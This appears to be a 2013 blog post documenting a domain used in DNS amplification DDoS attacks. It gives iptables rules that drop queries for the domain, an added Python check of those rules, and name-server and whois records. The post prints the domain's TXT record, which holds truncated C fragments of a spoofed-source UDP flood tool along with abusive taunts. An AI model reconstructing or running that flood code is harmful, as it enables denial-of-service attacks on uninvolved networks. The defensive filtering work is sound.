Thursday, November 14, 2013

Domain: x.mpnp.info

Also seeing:

g.mpnp.info
j.mpnp.info
a.mpnp.info
z.mpnp.info


Another domain with a personalized message! I feel so special.

If you are seeing queries for this domain, then you are likely participating in DNS amplification attacks: your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain... unlucky. You are currently being DDoS-ed! Good luck.


IPtables:

Updated the rule below to match on any single-character subdomain of .mpnp.info:

There are two iptables rules available. If your distribution supports the iptables 'u32' module, pick that one; otherwise use the 'string' rule.

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFF00FFDF=0x0100044d && 0x2c&0xDFDFDFFF=0x504e5004 && 0x30&0xDFDFDFDF=0x494e464f && 0x34&0xFF000000=0x00000000" -j DROP -m comment --comment "DROP DNS Q x.mpnp.info"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 42 --to 53 --algo bm --hex-string '|046d706e7004696e666f00|' -j DROP -m comment --comment "DROP DNS Q x.mpnp.info"

More iptables rules for the STRING module can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt
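To see what the two rules above actually match before loading them, here is an added example (not from the original post or the smurfmonitor repository) that builds constructed IPv4/UDP/DNS query packets and evaluates the u32 tests and the string window against them in Python. The builder, packet fields and IP addresses are assumptions for the sake of the example; the offsets, masks, values and hex-string are copied from the rules.

```python
import struct

# The four (offset, mask, value) tests from the page's u32 rule.
U32_TESTS = [
    (0x28, 0xFF00FFDF, 0x0100044D),  # label len 1, any char, label len 4, 'M'/'m'
    (0x2C, 0xDFDFDFFF, 0x504E5004),  # 'pnp' (case folded by the 0xDF masks), len 4
    (0x30, 0xDFDFDFDF, 0x494E464F),  # 'info' (case folded)
    (0x34, 0xFF000000, 0x00000000),  # root label terminator
]
STRING_PATTERN = bytes.fromhex("046d706e7004696e666f00")  # from the string rule


def encode_qname(name):
    """Wire-format DNS name: length-prefixed labels, terminated by a zero byte."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode() for l in labels) + b"\x00"


def build_query(qname, qtype=16, ihl_words=5):
    """Constructed IPv4/UDP/DNS query (sample input, not a capture). ihl_words > 5
    pads the IP header with NOP options so the payload shifts, as a real packet
    carrying IP options would."""
    question = encode_qname(qname) + struct.pack("!HH", qtype, 1)
    dns = struct.pack("!HHHHHH", 0x1234, 0x0100, 1, 0, 0, 0) + question
    udp = struct.pack("!HHHH", 40000, 53, 8 + len(dns), 0)
    options = b"\x01" * ((ihl_words - 5) * 4)
    total = 20 + len(options) + len(udp) + len(dns)
    ip = struct.pack("!BBHHHBBH4s4s", 0x40 | ihl_words, 0, total, 0, 0, 64, 17, 0,
                     bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]))
    return ip + options + udp + dns


def u32_matches(packet, tests=U32_TESTS):
    """Apply the u32 tests the way the kernel does: read a big-endian 32-bit
    word at each fixed offset from the start of the IP header, mask, compare."""
    for offset, mask, value in tests:
        if offset + 4 > len(packet):      # u32 fails if the word lies past the end
            return False
        word = struct.unpack("!I", packet[offset:offset + 4])[0]
        if word & mask != value:
            return False
    return True


def string_matches(packet, pattern=STRING_PATTERN, start=42, end=53):
    """Approximation of the string module: byte-exact search for the pattern
    inside the window [start, end) of the packet, with no case folding."""
    return pattern in packet[start:end]
```

Two caveats fall out of running it: the u32 masks fold case, so x.MPNP.INFO is dropped, while the string rule is byte-exact and lets it through unless --icase is added; and both rules assume a 20-byte IP header, so a query carrying IP options shifts past the fixed offsets and is not matched.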

Source:


No IP source for this domain

Name server:

mpnp.info.              86400   IN      NS      ns2.mpnp.info.
mpnp.info.              86400   IN      NS      ns1.mpnp.info.

ns1.mpnp.info.          86400   IN      A       149.3.143.130
ns2.mpnp.info.          77502   IN      A       149.3.143.130

Response:


TXT 1
Rsize 3948


"void attack(unsigned long srcip, int srcport, unsigned long destip, int destport, char *message){int s = socket (PF_INET, SOCK_RAW, IPPROTO_UDP)\;char packet[4096]\;structiphdr *iph = (struct iphdr *)packet\;structtcphd" ">" "struct sockaddr_in sin\;struct pseudo_header psh\;sin.sin_family = AF_INET\;sin.sin_port = htons(destport)\;sin.sin_addr.s_addr = destip\; memset (packet, 0, 4096)\;iph->ihl = 5\;iph->version = 4\;iph->tos = 16\;iph->tot_len = sizeof (struct ip) + sizeof (s" ">" "iph->id =                    htonl (54321)\; iph->frag_off = 0\;iph->ttl = 255\;iph->protocol = IPPROTO_UDP\;iph->check = 0\;iph->saddr = s rcip\;iph->daddr = sin.sin_addr.s_addr\;udph->source = htons(srcport)\;strncpy((char *)udph + sizeof (struct udphdr),message, 4096 - (si" ">" "void *thread_attack(void *thread_params){struct pthread_param *params = thread_params\;\009int i\;\009while (1)for (i = 0\; i < params->list_size\; i++)attack(params->victim_ip, rand() %65534 + 1, params->list[i].ip, params->list[i].port, params->message)\;" ">" "printf(Usage: %s <destip> <destport> <ip_file_list> <time in seconds> <message>/n, argv[0])\;if (argc != 6){printf(JoyPowerBot: %s <destip> <destport> <ip_file_list> <time in seconds> <message>/n, argv[0])\;return -1\;}srand(time(0))\;FILE *pFile =---- " ">" "param.list_size = list_size\;param.message = /xFF/xFF/xFF/xFF/x67/x65/x74/x73/x74/x61/x74/x75/x73/x10\;pthread_create( &udp_attack, NULL, thread_attack, (void*) &param)\;printf([*] Attacking../n)\;sleep(atoi(argv[4]))\;printf([!] Done/n)\;return 0\;------" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.       
com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-d                     nsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">""dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "GREATINGS:  ----FUKOFF FOR PAIN(QQ NOOB) I FUCKED UR MUM YESTERDAY.\;---- QQ DDOS-GUARD. WANNA SEE 300gbit?@24/7? 
I WILL SHOW U, CUZ U ARE ASSHOLES\;----  QQ dnsamplication, u are the best, ty man for this blog\;)*kissing* u are doing a good work.--- " ">" "8========================================================================                                                   ===================================================================================================>"


Well interesting...

Whois


Domain ID:D51006486-LRMS
Domain Name:MPNP.INFO
Created On:13-Nov-2013 16:04:31 UTC
Last Updated On:13-Nov-2013 16:22:32 UTC
Expiration Date:13-Nov-2014 16:04:31 UTC
Sponsoring Registrar:DomainContext Inc. (R524-LRMS)
Status:CLIENT TRANSFER PROHIBITED
Status:TRANSFER PROHIBITED
Status:ADDPERIOD
Registrant ID:PP-SP-001
Registrant Name:Domain Admin
Registrant Organization:PrivacyProtect.org
Registrant Street1:ID#10760, PO Box 16
Registrant Street2:Note - Visit PrivacyProtect.org to contact the domain owner/operator
Registrant Street3:
Registrant City:Nobby Beach
Registrant State/Province:
Registrant Postal Code:QLD 4218
Registrant Country:AU
Registrant Phone:+45.36946676
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:contact@privacyprotect.org
Admin ID:PP-SP-001
Admin Name:Domain Admin
Admin Organization:PrivacyProtect.org
Admin Street1:ID#10760, PO Box 16
Admin Street2:Note - Visit PrivacyProtect.org to contact the domain owner/operator
Admin Street3:
Admin City:Nobby Beach
Admin State/Province:
Admin Postal Code:QLD 4218
Admin Country:AU
Admin Phone:+45.36946676
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:contact@privacyprotect.org
Billing ID:PP-SP-001
Billing Name:Domain Admin
Billing Organization:PrivacyProtect.org
Billing Street1:ID#10760, PO Box 16
Billing Street2:Note - Visit PrivacyProtect.org to contact the domain owner/operator
Billing Street3:
Billing City:Nobby Beach
Billing State/Province:
Billing Postal Code:QLD 4218
Billing Country:AU
Billing Phone:+45.36946676
Billing Phone Ext.:
Billing FAX:
Billing FAX Ext.:
Billing Email:contact@privacyprotect.org
Tech ID:PP-SP-001
Tech Name:Domain Admin
Tech Organization:PrivacyProtect.org
Tech Street1:ID#10760, PO Box 16
Tech Street2:Note - Visit PrivacyProtect.org to contact the domain owner/operator
Tech Street3:
Tech City:Nobby Beach
Tech State/Province:
Tech Postal Code:QLD 4218
Tech Country:AU
Tech Phone:+45.36946676
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:contact@privacyprotect.org
Name Server:NS1.MPNP.INFO
Name Server:NS2.MPNP.INFO